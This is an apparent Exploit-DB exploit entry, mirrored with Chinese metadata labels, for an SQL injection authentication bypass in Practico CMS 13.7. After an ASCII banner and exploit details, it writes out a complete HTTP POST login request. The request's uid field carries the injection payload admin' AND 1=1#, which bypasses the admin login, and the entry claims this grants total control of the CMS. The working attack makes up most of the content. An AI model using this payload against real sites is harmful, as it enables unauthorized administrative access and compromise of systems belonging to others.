Practico CMS 13.7 – Authentication Bypass

  • 作者: shiZheni
    日期: 2013-09-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/28129/
  • ############################################################
    #______ __ __ ___________ __________ __ _____
    # |____ | | | || |_ __||___||||| | | | \|||__ __|
    #/ / | | |||| \\ |||| | __| |\ || ||
    #//| |__||||\ \ ||__|| ||__| \|| ||
    #//|__ |||\ \ |__| | __| | \|| ||
    #/ /___| || | __||_____\ \ ||| | ||__|| \\||__||__
    #|______||__||__| |______| |_____ | |__||__| |____| |__| \___ | |_____ |
    # 
    ############################################################
    
    # Exploit Title: Practico Login SQL Injection
    # Date: 2013 - 08 - 12
    # Exploit Author: shiZheni
    # Software Link: http://www.codigoabierto.org/
    # Software Download Link : http://sourceforge.net/projects/practico/files/
    # Version: 13.7 
    # Afected Version : 13.7 < and Last 
    # Tested on: Window 7 and PHP 5.3.15
    
    ==================================================
    #1 [ SQLi]Login - Admin ( Total Access )
    
    
    POST /demo/practico/ HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 73
    Referer: http://localhost/demo/practico/
    Host: localhost
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    
    accion=Iniciar_login&uid=admin%27+AND+1%3D1%23&clave=password&captcha=mrr6
    
    This vulnerability give you total access and control in the CMS.